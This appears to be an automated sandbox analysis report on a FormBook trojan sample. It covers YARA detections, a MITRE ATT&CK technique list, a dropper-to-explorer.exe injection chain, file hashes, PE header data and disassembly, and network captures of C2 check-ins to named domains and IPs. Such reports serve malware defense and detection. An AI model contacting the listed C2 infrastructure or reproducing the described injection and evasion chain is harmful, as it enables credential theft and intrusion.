          Source: explorer.exe, 00000005.00000000.369902961.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.278476010.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.255927905.000000000069D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd4
          Source: explorer.exe, 00000005.00000000.278690681.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.256196895.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.370103670.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: WProgram Manager
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 1_2_003B3283 cpuid 1_2_003B3283
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe Code function: 1_2_003B3EC8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,1_2_003B3EC8
          Source: C:\Users\user\Desktop\inlaww321345.exe Code function: 0_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403646

          Stealing of Sensitive Information

          Source: Yara match File source: 2.2.idczzzzbpy.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.2.idczzzzbpy.exe.700000.1.unpack, type: UNPACKEDPE
          Source: Yara match File source: 2.0.idczzzzbpy.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara match File source: 2.0.idczzzzbpy.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 2.0.idczzzzbpy.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.2.idczzzzbpy.exe.700000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 2.0.idczzzzbpy.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara match File source: 2.0.idczzzzbpy.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara match File source: 2.2.idczzzzbpy.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara match File source: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000000.246864810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000005.00000000.289205800.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000005.00000000.306971961.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000002.319619508.0000000001180000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000010.00000002.507830951.0000000000F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000002.251263067.0000000000700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000000.248745140.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000010.00000002.507774952.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000002.319548614.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          Source: Yara match File source: 2.2.idczzzzbpy.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.2.idczzzzbpy.exe.700000.1.unpack, type: UNPACKEDPE
          Source: Yara match File source: 2.0.idczzzzbpy.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara match File source: 2.0.idczzzzbpy.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 2.0.idczzzzbpy.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.2.idczzzzbpy.exe.700000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 2.0.idczzzzbpy.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara match File source: 2.0.idczzzzbpy.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara match File source: 2.2.idczzzzbpy.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara match File source: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000000.246864810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000005.00000000.289205800.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000005.00000000.306971961.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000002.319619508.0000000001180000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000010.00000002.507830951.0000000000F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000002.251263067.0000000000700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000000.248745140.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000010.00000002.507774952.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000002.319548614.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
          Execution: 2 Command and Scripting Interpreter; 1 Native API; 1 Shared Modules; At (Windows); Cron; Launchd; Scheduled Task
          Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
          Privilege Escalation: 1 Access Token Manipulation; 512 Process Injection; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
          Defense Evasion: 1 Rootkit; 2 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 512 Process Injection; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 1 Software Packing
          Credential Access: 1 Credential API Hooking; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
          Discovery: 1 System Time Discovery; 251 Security Software Discovery; 2 Virtualization/Sandbox Evasion; 2 Process Discovery; 1 Remote System Discovery; 2 File and Directory Discovery; 114 System Information Discovery
          Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
          Collection: 1 Credential API Hooking; 1 Archive Collected Data; 1 Clipboard Data; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
          Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
          Command and Control: 1 Encrypted Channel; 1 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 12 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port
          Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points
          Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
          Impact: 1 System Shutdown/Reboot; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact

          Behavior graph (ID: 626561; sample: inlaww321345.exe; start date: 14/05/2022; architecture: WINDOWS; score: 100). Process chain: inlaww321345.exe drops C:\Users\user\AppData\...\idczzzzbpy.exe (PE32) and starts idczzzzbpy.exe, which starts a second idczzzzbpy.exe, which injects into explorer.exe; explorer.exe contacts www.tzjisheng.com (154.85.152.171, port 80) and www.informacion-numero-24-h.site (188.114.96.10, port 80) and starts chkdsk.exe, which starts cmd.exe, which starts conhost.exe.

          Source | Detection | Scanner | Label
          inlaww321345.exe | 54% | Virustotal |
          inlaww321345.exe | 56% | ReversingLabs | Win32.Trojan.FormBook
          inlaww321345.exe | 100% | Joe Sandbox ML |

          Source | Detection | Scanner | Label
          C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe | 46% | ReversingLabs | Win32.Trojan.FormBook

          Source | Detection | Scanner | Label
          2.0.idczzzzbpy.exe.400000.7.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          1.2.idczzzzbpy.exe.700000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          2.0.idczzzzbpy.exe.400000.9.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          2.0.idczzzzbpy.exe.400000.5.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          2.2.idczzzzbpy.exe.400000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Source | Detection | Scanner | Label
          www.tzjisheng.com | 0% | Virustotal |

          Source | Detection | Scanner | Label
          http://www.tzjisheng.com/sn31/?p6Ah=2a7s6yRQu5sKFClQSChidlXjlxi9pt4Q5wJ1geib+tah5K7nc27GLkEkTe4Wsszvrpha&3fK84j=bDKp2PCxjp9Dyht0 | 0% | Avira URL Cloud | safe
          www.boxberry-my.com/sn31/ | 100% | Avira URL Cloud | malware
          http://www.informacion-numero-24-h.site/sn31/?3fK84j=bDKp2PCxjp9Dyht0&p6Ah=F3OPTzYh/KYNQDx4mU9pmepphtdjiinNkarquV5J38/xiILCZYJsFfYNFvKas6or25OS | 0% | Avira URL Cloud | safe

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          parkingpage.namecheap.com | 198.54.117.212 | true | false | | high
          www.informacion-numero-24-h.site | 188.114.96.10 | true | true | | unknown
          www.tzjisheng.com | 154.85.152.171 | true | true | | unknown
          www.rodosmail.xyz | unknown | unknown | true | | unknown

          Name | Malicious | Antivirus Detection | Reputation
          http://www.tzjisheng.com/sn31/?p6Ah=2a7s6yRQu5sKFClQSChidlXjlxi9pt4Q5wJ1geib+tah5K7nc27GLkEkTe4Wsszvrpha&3fK84j=bDKp2PCxjp9Dyht0 | true | Avira URL Cloud: safe | unknown
          www.boxberry-my.com/sn31/ | true | Avira URL Cloud: malware | low
          http://www.informacion-numero-24-h.site/sn31/?3fK84j=bDKp2PCxjp9Dyht0&p6Ah=F3OPTzYh/KYNQDx4mU9pmepphtdjiinNkarquV5J38/xiILCZYJsFfYNFvKas6or25OS | true | Avira URL Cloud: safe | unknown

          Name | Source | Malicious | Antivirus Detection | Reputation
          http://nsis.sf.net/NSIS_ErrorError | inlaww321345.exe | false | | high

          IP | Domain | Country | ASN | ASN Name | Malicious
          154.85.152.171 | www.tzjisheng.com | Seychelles | 134548 | DXTL-HKDXTLTseungKwanOServiceHK | true
          188.114.96.10 | www.informacion-numero-24-h.site | European Union | 13335 | CLOUDFLARENETUS | true

                  Joe Sandbox Version:34.0.0 Boulder Opal
                  Analysis ID:626561
                  Start date and time: 2022-05-14 13:06:16 +02:00
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 9m 26s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Sample file name:inlaww321345.exe
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                  Number of analysed new started processes analysed:28
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:1
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal100.troj.evad.winEXE@9/4@3/2
                  EGA Information:
                  • Successful, ratio: 100%
                  HDC Information:
                  • Successful, ratio: 54.9% (good quality ratio 51%)
                  • Quality average: 76.7%
                  • Quality standard deviation: 29.8%
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 104
                  • Number of non-executed functions: 209
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Adjust boot time
                  • Enable AMSI
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                  • Excluded IPs from analysis (whitelisted): 173.222.108.226, 173.222.108.210
                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, arc.msn.com, wu-bg-shim.trafficmanager.net, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, ocsp.digicert.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net
                  • Not all processes were analyzed, report is missing behavior information
                  No simulations
                  Process:C:\Users\user\Desktop\inlaww321345.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):189439
                  Entropy (8bit):7.991264884489158
                  Encrypted:true
                  SSDEEP:3072:RpjM1D/FiGY508jL8Ih5Ua5OtVtVN20+DLQLYUL11uXGI7dOPHl/vqJJr7iQxX4Y:Q1bY08jwy5UakVtVNAKYULKX5d2/vq7P
                  MD5:E3D27BCFA9AA0D4B5A3F6B09ABBD95A0
                  SHA1:FF9D9165EEB1BC30B24824E3179CE751D0D171CA
                  SHA-256:9367FD47E61A19528C3F5CF2C8DCB9A966AC2760E0E0303D98CB16569DC571C0
                  SHA-512:58C1AD3827E29D5948D5E20330D7B690700BB87618A9635C032FEA2B86435ED8B5D34C9959FABE652478CF775826325CE78E9310F4086159C1DF74E6FD64BBC2
                  Malicious:false
                  Reputation:low
                  Process:C:\Users\user\Desktop\inlaww321345.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):80384
                  Entropy (8bit):6.294068907954178
                  Encrypted:false
                  SSDEEP:1536:q6TaC+v1wwfr0oxAomP3cX/4pi2sWjcdNdI:va5CwD1/ui5NW
                  MD5:0A3F789C1F124B76E2EDC74EBEACF70A
                  SHA1:780584F128175C82C09BE5237D6F18CA71F5AF8A
                  SHA-256:88475EA713BF4983BAD0C805626D4C36B4C7F556E0CFE3220D54A66AF49536ED
                  SHA-512:8E6E8107B29C2CBDEA7D0D10F40C0BCB5834C7EE72AD420354B1F10154F263029877F32CC4B66D20C75250C3F9ABEDE40DC9E74AD54472C30E52E5089FE8D1C4
                  Malicious:true
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 46%
                  Reputation:low
                  Process:C:\Users\user\Desktop\inlaww321345.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):5222
                  Entropy (8bit):6.125161523920119
                  Encrypted:false
                  SSDEEP:96:FAhV3vZOvLSjq3D+2flg3yDUfp7yxbEJhScKZTQOEbzjT:FAh3OvLSGCDCU7yxbEJhLKlQLD
                  MD5:724AADB7157867E0297086B8CB329FDD
                  SHA1:2CAF2D787B88C05EE73FC815F528D0519597BCEC
                  SHA-256:FF0DA8E72E0EB7C85762F73D269CB37E6EF6AB78BCDCDD02CBC600921B416A4F
                  SHA-512:939650530ED755EAEC138D0397CF69095159EACE33A5782094791F2315CBA3693F0FCC0DD2E40DEB4A3E58FD75010F52191FEF6E1053C1C5AE3EEA7CB4F9FE9D
                  Malicious:false
                  Reputation:low
                  Process:C:\Users\user\Desktop\inlaww321345.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):281625
                  Entropy (8bit):7.654738046594992
                  Encrypted:false
                  SSDEEP:6144:c1bY08jwy5UakVtVNAKYULKX5d2/vq77i+9hiCkC:h0oUL/0Ukd2ki8hiCx
                  MD5:585D37FBFEFC8B840674B7FBDDDF74A4
                  SHA1:D4027F373F35D9CBDF5C52F98B30C81C74C61BDB
                  SHA-256:4E75A79C5CBEC5424037AF3B798D39110AD2247FC7E4F59DC69FA85E62C34C16
                  SHA-512:98C2B9ABBB5E8808C107F2232AF8ED047DE5E9445C6D27A6787021450317F66CBE717D492EA3A9D7B3F81AC8068B5BB317FA205CAA92FC93BA15945B6E79610B
                  Malicious:false
                  Reputation:low
                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                  Entropy (8bit):7.915739431814618
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.96%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:inlaww321345.exe
                  File size:277700
                  MD5:43e64e0ab6ca479c2af3afed56216a91
                  SHA1:983a822ffde2b558dfe2a8ac1dcc4d42df0f1d94
                  SHA256:cbdf1e33bc694b1ca634a4b042bd010050c9baf99078c91adf961ef92cebd305
                  SHA512:091159b524e3150e412a56f39193601b76fd644c8db4042293e37dfdc54c7d416efc1bfbec4c832fd7b54140b047cda55eee45d834b0fad40f50b800d95003f0
                  SSDEEP:6144:LOtIOKoTojUJuQVK0V4SwDTlAKht8Zy+ksPmQeSB+UGlk:LOLzoYJuQVK0V41GatH+kzQeSB+UGlk
                  TLSH:76441202EBB0C073E6A36E365D3E8B374DE5C9A25815AB2B4B547609BD766C2C10F743
                  Icon Hash:b2a88c96b2ca6a72
                  Entrypoint:0x403646
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                  Time Stamp:0x614F9AA9 [Sat Sep 25 21:54:49 2021 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:4
                  OS Version Minor:0
                  File Version Major:4
                  File Version Minor:0
                  Subsystem Version Major:4
                  Subsystem Version Minor:0
                  Import Hash:61259b55b8912888e90f516ca08dc514
                  Instruction
                  push ebp
                  mov ebp, esp
                  sub esp, 000003F4h
                  push ebx
                  push esi
                  push edi
                  push 00000020h
                  pop edi
                  xor ebx, ebx
                  push 00008001h
                  mov dword ptr [ebp-14h], ebx
                  mov dword ptr [ebp-04h], 0040A230h
                  mov dword ptr [ebp-10h], ebx
                  call dword ptr [004080C8h]
                  mov esi, dword ptr [004080CCh]
                  lea eax, dword ptr [ebp-00000140h]
                  push eax
                  mov dword ptr [ebp-0000012Ch], ebx
                  mov dword ptr [ebp-2Ch], ebx
                  mov dword ptr [ebp-28h], ebx
                  mov dword ptr [ebp-00000140h], 0000011Ch
                  call esi
                  test eax, eax
                  jne 00007FBB449DEC1Ah
                  lea eax, dword ptr [ebp-00000140h]
                  mov dword ptr [ebp-00000140h], 00000114h
                  push eax
                  call esi
                  mov ax, word ptr [ebp-0000012Ch]
                  mov ecx, dword ptr [ebp-00000112h]
                  sub ax, 00000053h
                  add ecx, FFFFFFD0h
                  neg ax
                  sbb eax, eax
                  mov byte ptr [ebp-26h], 00000004h
                  not eax
                  and eax, ecx
                  mov word ptr [ebp-2Ch], ax
                  cmp dword ptr [ebp-0000013Ch], 0Ah
                  jnc 00007FBB449DEBEAh
                  and word ptr [ebp-00000132h], 0000h
                  mov eax, dword ptr [ebp-00000134h]
                  movzx ecx, byte ptr [ebp-00000138h]
                  mov dword ptr [007A8B58h], eax
                  xor eax, eax
                  mov ah, byte ptr [ebp-0000013Ch]
                  movzx eax, ax
                  or eax, ecx
                  xor ecx, ecx
                  mov ch, byte ptr [ebp-2Ch]
                  movzx ecx, cx
                  shl eax, 10h
                  or eax, ecx
                  Programming Language:
                  • [EXP] VC++ 6.0 SP5 build 8804
                  Name | Virtual Address | Virtual Size | Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8504 | 0xa0 | .rdata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3b9000 | 0xa50 | .rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b0 | .rdata
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                  Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                  .text | 0x1000 | 0x67c4 | 0x6800 | False | 0.675180288462 | data | 6.49518266675 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  .rdata | 0x8000 | 0x139a | 0x1400 | False | 0.4498046875 | data | 5.14106681717 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .data | 0xa000 | 0x39ebb8 | 0x600 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                  .ndata | 0x3a9000 | 0x10000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .rsrc | 0x3b9000 | 0xa50 | 0xc00 | False | 0.401692708333 | data | 4.18753619353 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  Name | RVA | Size | Type | Language | Country
                  RT_ICON | 0x3b9190 | 0x2e8 | data | English | United States
                  RT_DIALOG | 0x3b9478 | 0x100 | data | English | United States
                  RT_DIALOG | 0x3b9578 | 0x11c | data | English | United States
                  RT_DIALOG | 0x3b9698 | 0x60 | data | English | United States
                  RT_GROUP_ICON | 0x3b96f8 | 0x14 | data | English | United States
                  RT_MANIFEST | 0x3b9710 | 0x33e | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States
                  DLL | Import
                  ADVAPI32.dll | RegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                  SHELL32.dll | SHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                  ole32.dll | OleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                  COMCTL32.dll | ImageList_Create, ImageList_Destroy, ImageList_AddMasked
                  USER32.dll | GetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                  GDI32.dll | SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                  KERNEL32.dll | GetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
                  Language of compilation system | Country where language is spoken
                  English | United States
                  Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                  05/14/22-13:08:49.696707 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49808 | 80 | 192.168.2.3 | 188.114.96.10
                  05/14/22-13:08:49.696707 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49808 | 80 | 192.168.2.3 | 188.114.96.10
                  05/14/22-13:08:49.696707 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49808 | 80 | 192.168.2.3 | 188.114.96.10
                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                  May 14, 2022 13:08:49.679449081 CEST | 49808 | 80 | 192.168.2.3 | 188.114.96.10
                  May 14, 2022 13:08:49.695677996 CEST | 80 | 49808 | 188.114.96.10 | 192.168.2.3
                  May 14, 2022 13:08:49.695893049 CEST | 49808 | 80 | 192.168.2.3 | 188.114.96.10
                  May 14, 2022 13:08:49.696707010 CEST | 49808 | 80 | 192.168.2.3 | 188.114.96.10
                  May 14, 2022 13:08:49.712908030 CEST | 80 | 49808 | 188.114.96.10 | 192.168.2.3
                  May 14, 2022 13:08:49.724560976 CEST | 80 | 49808 | 188.114.96.10 | 192.168.2.3
                  May 14, 2022 13:08:49.724622965 CEST | 80 | 49808 | 188.114.96.10 | 192.168.2.3
                  May 14, 2022 13:08:49.724986076 CEST | 49808 | 80 | 192.168.2.3 | 188.114.96.10
                  May 14, 2022 13:08:49.725151062 CEST | 49808 | 80 | 192.168.2.3 | 188.114.96.10
                  May 14, 2022 13:08:49.741282940 CEST | 80 | 49808 | 188.114.96.10 | 192.168.2.3
                  May 14, 2022 13:09:10.119378090 CEST | 49810 | 80 | 192.168.2.3 | 154.85.152.171
                  May 14, 2022 13:09:10.303877115 CEST | 80 | 49810 | 154.85.152.171 | 192.168.2.3
                  May 14, 2022 13:09:10.304033041 CEST | 49810 | 80 | 192.168.2.3 | 154.85.152.171
                  May 14, 2022 13:09:10.304163933 CEST | 49810 | 80 | 192.168.2.3 | 154.85.152.171
                  May 14, 2022 13:09:10.490811110 CEST | 80 | 49810 | 154.85.152.171 | 192.168.2.3
                  May 14, 2022 13:09:10.490907907 CEST | 80 | 49810 | 154.85.152.171 | 192.168.2.3
                  May 14, 2022 13:09:10.490958929 CEST | 80 | 49810 | 154.85.152.171 | 192.168.2.3
                  May 14, 2022 13:09:10.491028070 CEST | 49810 | 80 | 192.168.2.3 | 154.85.152.171
                  May 14, 2022 13:09:10.491060019 CEST | 49810 | 80 | 192.168.2.3 | 154.85.152.171
                  May 14, 2022 13:09:10.491131067 CEST | 49810 | 80 | 192.168.2.3 | 154.85.152.171
                  May 14, 2022 13:09:10.675293922 CEST | 80 | 49810 | 154.85.152.171 | 192.168.2.3
                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
